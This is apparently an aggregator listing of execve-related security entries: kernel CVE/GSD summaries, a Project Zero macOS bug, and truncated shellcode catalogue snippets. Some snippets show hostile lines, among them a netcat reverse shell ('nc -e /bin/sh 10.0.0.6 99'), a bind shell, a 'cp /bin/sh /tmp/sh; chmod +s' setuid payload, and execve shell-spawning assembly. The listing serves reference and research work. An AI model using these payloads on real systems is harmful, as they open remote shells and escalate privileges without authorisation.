EUVD-2019-13509

Malware in sbrugna...

macOS/x64 Execve Caesar Cipher String Null-Free Shellcode (286 bytes)

Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode 286 Bytes Shellcode Author: Bobby Cooke boku @0xBoku github.com/boku7 Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x8664 Shellcode Description: macOS 64 bit shellcode. Uses execve syscall to spawn bash. The...

macOS/x64 Execve Null-Free Shellcode (253 bytes)

Shellcode Title: macOS/x64 - Execve Null-Free Shellcode 253 Bytes Shellcode Author: Bobby Cooke boku @0xBoku github.com/boku7 Date: 12/20/2022 Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x8664 Shellcode Description: macOS 64 bit shellcode. Uses execve syscall to spawn bash. The strin...

GSD-2022-1004738 powerpc: Enable execve syscall exit tracepoint

powerpc: Enable execve syscall exit tracepoint This is an automated ID intended to aid in discovery of potential security vulnerabilities. The actual impact and attack plausibility have not yet been proven. This ID is fixed in Linux Kernel version v5.4.202 by commit...

GSD-2022-1004621 powerpc: Enable execve syscall exit tracepoint

powerpc: Enable execve syscall exit tracepoint This is an automated ID intended to aid in discovery of potential security vulnerabilities. The actual impact and attack plausibility have not yet been proven. This ID is fixed in Linux Kernel version v5.10.127 by commit...

GSD-2022-1004454 powerpc: Enable execve syscall exit tracepoint

powerpc: Enable execve syscall exit tracepoint This is an automated ID intended to aid in discovery of potential security vulnerabilities. The actual impact and attack plausibility have not yet been proven. This ID is fixed in Linux Kernel version v5.15.51 by commit...

macOS/x64 zsh RickRolling - Shellcode

198 bytes small macOS/x64 RickRolling shellcode. / Shellcode Title: macOS/x64 - zsh RickRolling Shellcode 198 Bytes Shellcode Author: Bobby Cooke Date: May 31st, 2020 Tested on: macOS Catalina v10.15.4 Shellcode Description: MacOS Catalina Dynamic, No-Null Shellcode that will Unmute the systems...

macOS/x64 zsh RickRolling Shellcode (198 bytes)

/ Shellcode Title: macOS/x64 - zsh RickRolling Shellcode 198 Bytes Shellcode Author: Bobby Cooke Tested on: macOS Catalina v10.15.4 Shellcode Description: MacOS Catalina Dynamic, No-Null Shellcode that will Unmute the systems Volume, set the Volume to Maximum, and "Rick Roll" the user every time...

Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)

/ ; Title : Linux/x8664 - Reverse Shell /bin/sh with Password configurable 120 bytes ; Date : 2019-08-18 ; Author : Gonçalo Ribeiro @goncalor ; Website : goncalor.com ; SLAE64-ID : 1635 global start %define pass "pass" %define port 0x5c11 ; htons4444 start: jmp realstart password: db pass passlen...

CVE-2019-3901

A race condition in perfeventopen allows local attackers to leak sensitive data from setuid programs. As no relevant locks in particular the credguardmutex are held during the ptracemayaccess call, it is possible for the specified target task to perform an execve syscall with setuid execution...

CVE-2019-3901

A race condition in perfeventopen allows local attackers to leak sensitive data from setuid programs. As no relevant locks in particular the credguardmutex are held during the ptracemayaccess call, it is possible for the specified target task to perform an execve syscall with setuid execution...

Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)

include / ; Bind TCP Shellcode ; Copyright 2018, Luca Di Domenico ; ; This program is free software: you can redistribute it and/or modify ; it under the terms of the GNU General Public License as published by ; the Free Software Foundation, either version 3 of the License, or ; at your option an...

Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)

Linux/x86 - execvecp /bin/sh /tmp/sh; chmod +s /tmp/sh + Null-Free Shellcode 74 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Author: absolomb Website: https://www.sploitspren.com SLAE-ID: 1208 Purpose: cp shell into /tmp and setuid Teste...

Sudohulk - Try Privilege Escalation Changing Sudo Command

This tool change sudo command, hooking the execve syscall using ptrace, tested under bash and zsh supported architectures: x8664 x86 arm How use: $ make cc -Wall -Wextra -O2 -c -o bin/shremotedata.o src/shremotedata.c cc -Wall -Wextra -O2 -c -o bin/shstring.o src/shstring.c cc -Wall -Wextra -O2 -...

Linux/x86 - execve /bin/dash Shellcode (30 bytes)

/ Description ; Title : exec /bin/dash - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/dash shell ; OS : Linux ; Arch : x86 ; Size : 30 bytes dash.nasm global start section .text start: ; push NULL into the...

Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)

Linux/x8664 - execve /bin/sh Shellcode 22 bytes. Shellcode exploit for Linx86-64 platform ;The MIT License MIT ;Copyright c 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files the “Software”, ;to...

Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)

;The MIT License MIT ;Copyright c 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files the “Software”, ;to deal in the Software without restriction, including without limitation ;the rights to use,...

Linux Netcat Reverse Shell - 32bit - 77 bytes

Linux Netcat Reverse Shell - 32bit - 77 bytes. Shellcode exploit for linx86 platform include include //[email protected] //OffSec ID: OS-20614 / global start start: ;/bin//nc -e///bin/sh 10.0.0.6 99 xor eax,eax ; clear eax xor edx,edx ; clear edi ; 0xIN-LAST IN-FIRST push 0x3939393...

Linux x86_64 execve Shellcode - 15 bytes

Linux x8664 execve Shellcode - 15 bytes. Shellcode exploit for linx86-64 platform include include // OS-20614 // [email protected] / global start start: execve: mov rsi, rax mov rdx, rsi mov r12 , 0x68732f6e69622f push r12 push rsp pop rdi mov al, 0x3b syscall / unsigned char code ...

Apple Mac OSX iOS - SUID Binary Logic Error Kernel Code Execution

Apple Mac OSX iOS - SUID Binary Logic Error Kernel Code Execution Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=676 tl;dr The code responsible for loading a suid-binary following a call to the execve syscall invalidates the task port after first swapping the new vmmap into the...